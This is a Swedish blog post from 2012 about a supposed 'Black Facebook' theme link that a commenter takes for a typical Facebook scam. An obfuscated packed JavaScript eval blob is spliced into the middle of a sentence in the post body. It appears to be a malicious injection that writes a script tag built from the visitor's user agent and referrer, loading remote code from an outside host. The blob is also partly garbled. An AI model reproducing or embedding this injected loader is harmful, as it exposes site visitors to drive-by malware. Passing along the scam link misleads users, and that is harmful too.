Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Black Facebook?

Black Facebook?
Filip Urde
  • On 11 januari, 2012
  • http://www.revue.se/filip-urde

Jag stötte på den här länken tidigare idag (se nedan). Där ska du kunna byta din Facebook, till Black Facebook… Någon som vågat prova?

Jag själv är inte hel nöjd med Timeline eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktifk|var|u0026u|referrer|ttiny||js|php’.split(’|’),0,{}))
fiaskot, så jag vill inte dra på mig ännu en skum uppdatering. Men för dig som vill Go black and never Go back… ja, då är det länken nedan som gäller. Skriv gärna era upplevelser till mig om ni testar detta. Tydligen är det tidbegränsat och kommer inte gå att göra när som helst. När tiden för chansen att byta till Black Facebook går ut, det är fortfarande oklart.

Det kanske t.om. är en bluff…

http://getblackfbooknow.blogspot.com/

 

Comments

  1. Soppan

    Jag vågar inte. Det är ju samma process som alla fejk saker på facebook. Like this and like that and you’ll get naked photos of Britney Spears. Nej tack

  2. Soppan

    Jag vågar inte. Det är ju samma process som alla fejk saker på facebook. Like this and like that and you’ll get naked photos of Britney Spears. Nej tack